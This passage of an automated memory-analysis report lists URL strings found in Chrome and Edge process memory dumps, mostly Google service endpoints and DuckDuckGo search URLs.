Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000013.00000002.2689061061.00004A2C0018C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2778573195.00004B080001F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000013.00000002.2689061061.00004A2C0018C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/J
Source: chrome.exe, 00000013.00000002.2713477658.00004A2C00BE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000013.00000003.2575798333.00003844002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2575775226.00003844002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000013.00000002.2688749362.00004A2C000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 00000013.00000002.2695182988.00004A2C006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692708952.00004A2C00618000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2706396490.00004A2C008E4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2778611918.00004B0800040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000013.00000002.2688749362.00004A2C000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/cx
Source: chrome.exe, 00000013.00000002.2707148268.00004A2C009C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000013.00000002.2707148268.00004A2C009C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bJ
Source: chrome.exe, 00000013.00000002.2707148268.00004A2C009C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000013.00000002.2706396490.00004A2C008E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000013.00000002.2692835975.00004A2C00630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000013.00000002.2706719206.00004A2C00924000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
Source: chrome.exe, 00000013.00000002.2707479075.00004A2C00A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000013.00000002.2689687616.00004A2C0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000013.00000002.2689553147.00004A2C002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000013.00000002.2689553147.00004A2C002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000003.2651755090.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690411249.00004A2C0047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600077601.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2722268123.00004A2C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692708952.00004A2C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000013.00000002.2689553147.00004A2C002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000003.2651755090.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690411249.00004A2C0047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600077601.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2722268123.00004A2C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692708952.00004A2C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000013.00000002.2689687616.00004A2C0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000013.00000002.2689687616.00004A2C0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000013.00000003.2585484473.00004A2C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000013.00000002.2689937106.00004A2C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713330303.00004A2C00BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp, wbaa16.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000013.00000002.2713330303.00004A2C00BAC000.00000004.00000800.00020000.00000000.sdmp, wbaa16.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000013.00000002.2713330303.00004A2C00BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%p
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/&q
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//p
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/0q
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3q
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6p
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:q
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=q
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?p
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Zn
Source: chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/q
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/Enabled_Notice_Expanded2_NoOT_CrossAppWebAra_Stable
Source: chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000013.00000003.2580262036.00000BEC00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2580936376.00000BEC006E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: msedge.exe, 00000020.00000002.2780257018.00004B08003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000013.00000002.2692228311.00004A2C005C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000013.00000002.2727150590.00004A2C00E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693preferSubmitOnAnySamplesPassedQueryEnd
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2727114876.00004A2C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2727114876.00004A2C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707329197.00004A2C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000013.00000003.2617145313.00004A2C019B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707329197.00004A2C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000013.00000003.2617145313.00004A2C019B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardJ
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000013.00000002.2686714464.00000BEC00770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707329197.00004A2C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000013.00000002.2690087673.00004A2C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2613378973.00004A2C01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2613481455.00004A2C01434000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000013.00000003.2580936376.00000BEC006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000013.00000002.2686682288.00000BEC00744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000013.00000002.2690087673.00004A2C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2613378973.00004A2C01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2613481455.00004A2C01434000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
